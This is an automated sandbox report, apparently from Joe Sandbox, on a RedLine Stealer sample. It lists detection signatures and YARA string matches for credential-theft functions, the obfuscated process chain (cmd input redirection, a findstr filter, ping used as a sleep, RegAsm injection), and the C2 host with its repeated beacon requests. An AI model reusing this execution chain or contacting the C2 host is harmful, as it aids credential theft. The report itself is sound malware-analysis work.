
Windows Analysis Report
2YLM6BQ9S3.exe

Overview

General Information

Sample name: 2YLM6BQ9S3.exe (renamed because original name is a hash value)
Original sample name: 7c86d24bf10f9a6970b3c7c86e455423.exe
Analysis ID: 1593404
MD5: 7c86d24bf10f9a6970b3c7c86e455423
SHA1: 390d4d70d950a0e0f1a2744296e841bf70024b8d
SHA256: 128985f1be0a64f43674e4e287eda262713c5bc3288582d97d1463b15d2d35f7
Tags: exe, RedLineStealer, user-abuse_ch

Detection

RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Obfuscated command line found
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 2YLM6BQ9S3.exe (PID: 6480 cmdline: "C:\Users\user\Desktop\2YLM6BQ9S3.exe" MD5: 7C86D24BF10F9A6970B3C7C86E455423)
    • cmd.exe (PID: 1996 cmdline: "C:\Windows\System32\cmd.exe" /c cmd < Ideale.adt MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6464 cmdline: cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • findstr.exe (PID: 2228 cmdline: findstr /V /R "^DzqZaKuCSEcQYFcSDUTCtNHXVpartBbUtTqjUWbpOSHHtRSBbGNtGZbQLrtosenduBMyFpYHvKOjuZSrsQGbOagtclAQSgSLxsADyMWgIuHVkkJLlqRAcq$" San.adt MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • Appartenga.exe.com (PID: 5656 cmdline: Appartenga.exe.com S MD5: C56B5F0201A3B3DE53E561FE76912BFD)
          • Appartenga.exe.com (PID: 6688 cmdline: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com S MD5: C56B5F0201A3B3DE53E561FE76912BFD)
            • RegAsm.exe (PID: 1520 cmdline: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • PING.EXE (PID: 5020 cmdline: ping 127.0.0.1 -n 30 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
RedLine Stealer | RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["gimpimageeditor.com:80"], "Bot Id": "20_1"}
Source | Rule | Description | Author | Strings
00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
      • 0xcac0:$a2: https://ipinfo.io/ip%appdata%\
      • 0xd278:$a3: Software\Valve\SteamLogin Data
      • 0x8b75:$a4: get_ScannedWallets
      • 0x7aba:$a5: get_ScanTelegram
      • 0x87ec:$a6: get_ScanGeckoBrowsersPaths
      • 0x672c:$a7: <Processes>k__BackingField
      • 0x4698:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
      • 0x6060:$a9: <ScanFTP>k__BackingField
00000008.00000003.2416510375.00000000042BA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000008.00000003.2416510375.00000000042BA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
Source | Rule | Description | Author | Strings
8.3.Appartenga.exe.com.429f508.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
8.3.Appartenga.exe.com.429f508.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
8.3.Appartenga.exe.com.429f508.0.unpack | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
              • 0x14858:$a2: https://ipinfo.io/ip%appdata%\
              • 0x15010:$a3: Software\Valve\SteamLogin Data
              • 0x1090d:$a4: get_ScannedWallets
              • 0xf852:$a5: get_ScanTelegram
              • 0x10584:$a6: get_ScanGeckoBrowsersPaths
              • 0xe4c4:$a7: <Processes>k__BackingField
              • 0xc430:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
              • 0xddf8:$a9: <ScanFTP>k__BackingField
8.3.Appartenga.exe.com.429f508.0.unpack | infostealer_win_redline_strings | Finds Redline samples based on characteristic strings | Sekoia.io
              • 0xedff:$gen01: ChromeGetRoamingName
              • 0xee33:$gen02: ChromeGetLocalName
              • 0xee5c:$gen03: get_UserDomainName
              • 0x10f8b:$gen04: get_encrypted_key
              • 0x10519:$gen05: browserPaths
              • 0x1087d:$gen06: GetBrowsers
              • 0x101c1:$gen07: get_InstalledInputLanguages
              • 0xdaa9:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
              • 0x14a08:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
              • 0x15490:$spe6: windows-1251, CommandLine:
              • 0x11723:$spe9: *wallet*
              • 0xc2c0:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20
              • 0xc3bb:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
              • 0xc6fa:$typ03: A937C899247696B6565665BE3BD09607F49A2042
              • 0xc807:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
              • 0xc976:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63
              • 0xc34c:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
              • 0xc375:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280
              • 0xc50c:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301
              • 0xc830:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2
              • 0xc8c8:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
8.3.Appartenga.exe.com.429f508.0.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
              • 0xd8e4:$u7: RunPE
              • 0x10e71:$u8: DownloadAndEx
              • 0x154a8:$pat14: , CommandLine:
              • 0x103d9:$v2_1: ListOfProcesses
              • 0xdae5:$v2_2: get_ScanVPN
              • 0xdb88:$v2_2: get_ScanFTP
              • 0xe873:$v2_2: get_ScanDiscord
              • 0xf836:$v2_2: get_ScanSteam
              • 0xf852:$v2_2: get_ScanTelegram
              • 0xf907:$v2_2: get_ScanScreen
              • 0x1054c:$v2_2: get_ScanChromeBrowsersPaths
              • 0x10584:$v2_2: get_ScanGeckoBrowsersPaths
              • 0x1085b:$v2_2: get_ScanBrowsers
              • 0x1090d:$v2_2: get_ScannedWallets
              • 0x10933:$v2_2: get_ScanWallets
              • 0x10953:$v2_3: GetArguments
              • 0x13a6a:$v2_3: GetArguments
              • 0xf100:$v2_4: VerifyUpdate
              • 0x13ab8:$v2_4: VerifyUpdate
              • 0x10d0f:$v2_5: VerifyScanRequest
              • 0x13a83:$v2_5: VerifyScanRequest

              System Summary

Source: Process started | Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems) | Data: Command: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com S, ParentImage: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com, ParentProcessId: 6688, ParentProcessName: Appartenga.exe.com, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe, ProcessId: 1520, ProcessName: RegAsm.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com S, ParentImage: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com, ParentProcessId: 6688, ParentProcessName: Appartenga.exe.com, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe, ProcessId: 1520, ProcessName: RegAsm.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-17T06:52:45.420272+0100 | 2034361 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49857 | 76.223.67.189 | 80 | TCP
2025-01-17T06:52:47.817643+0100 | 2034361 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49857 | 76.223.67.189 | 80 | TCP



              AV Detection

Source: 2YLM6BQ9S3.exe | Avira: detected
Source: http://gimpimageeditor.com/ | Avira URL Cloud: Label: malware
Source: http://gimpimageeditor.com:80/ | Avira URL Cloud: Label: malware
Source: http://gimpimageeditor.com | Avira URL Cloud: Label: malware
Source: gimpimageeditor.com:80 | Avira URL Cloud: Label: malware
Source: 8.3.Appartenga.exe.com.429f508.0.raw.unpack | Malware Configuration Extractor: RedLine {"C2 url": ["gimpimageeditor.com:80"], "Bot Id": "20_1"}
Source: 2YLM6BQ9S3.exe | ReversingLabs: Detection: 57%
Source: 2YLM6BQ9S3.exe | Virustotal: Detection: 54%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.1% probability
Source: 2YLM6BQ9S3.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Binary string: nHC:\Windows\System.ServiceModel.pdbpdbdel.pdb source: RegAsm.exe, 0000000A.00000002.3266505833.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.ServiceModel.pdbr62 source: RegAsm.exe, 0000000A.00000002.3266824842.0000000000A04000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbS source: RegAsm.exe, 0000000A.00000002.3266824842.0000000000A04000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: RegAsm.pdb source: RegAsm.exe, 0000000A.00000000.2371566771.0000000000342000.00000002.00000001.01000000.00000006.sdmp, RegAsm.exe.8.dr
              Source: Binary string: C:\Windows\System.ServiceModel.pdb source: RegAsm.exe, 0000000A.00000002.3266505833.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: ystem.ServiceModel.pdb source: RegAsm.exe, 0000000A.00000002.3270045038.0000000005B2E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000000A.00000000.2371566771.0000000000342000.00000002.00000001.01000000.00000006.sdmp, RegAsm.exe.8.dr
              Source: Binary string: System.ServiceModel.pdb source: RegAsm.exe, 0000000A.00000002.3266824842.000000000095F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegAsm.exe, 0000000A.00000002.3266824842.000000000095F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: RegAsm.exe, 0000000A.00000002.3270045038.0000000005B2E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbB source: RegAsm.exe, 0000000A.00000002.3266824842.0000000000A04000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Code function: 0_2_00402F3A FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402F3A
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Code function: 0_2_004033DB GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_004033DB
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C3494A GetFileAttributesW,FindFirstFileW,FindClose,6_2_00C3494A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C34005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00C34005
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C3C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00C3C2FF
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C3CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_00C3CD9F
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C3CD14 FindFirstFileW,FindClose,6_2_00C3CD14
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C3F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00C3F5D8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C3F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00C3F735
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C3FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00C3FA36
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C33CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00C33CE2

              Networking

Source: Network traffic | Suricata IDS: 2034361 - Severity 1 - ET MALWARE RedLine - GetArguments Request : 192.168.2.5:49857 -> 76.223.67.189:80
Source: Malware configuration extractor | URLs: gimpimageeditor.com:80
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/GetArguments" | Host: gimpimageeditor.com | Content-Length: 137 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/GetArguments" | Host: gimpimageeditor.com | Content-Length: 137 | Expect: 100-continue | Accept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: gimpimageeditor.comContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
Source: Joe Sandbox View | IP Address: 76.223.67.189
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C429BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 6_2_00C429BA
Source: global traffic | DNS traffic detected: DNS query: FUaPHLaTpAPGRbsfxOMdnwBFBsmro.FUaPHLaTpAPGRbsfxOMdnwBFBsmro
Source: global traffic | DNS traffic detected: DNS query: gimpimageeditor.com
Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/GetArguments" | Host: gimpimageeditor.com | Content-Length: 137 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
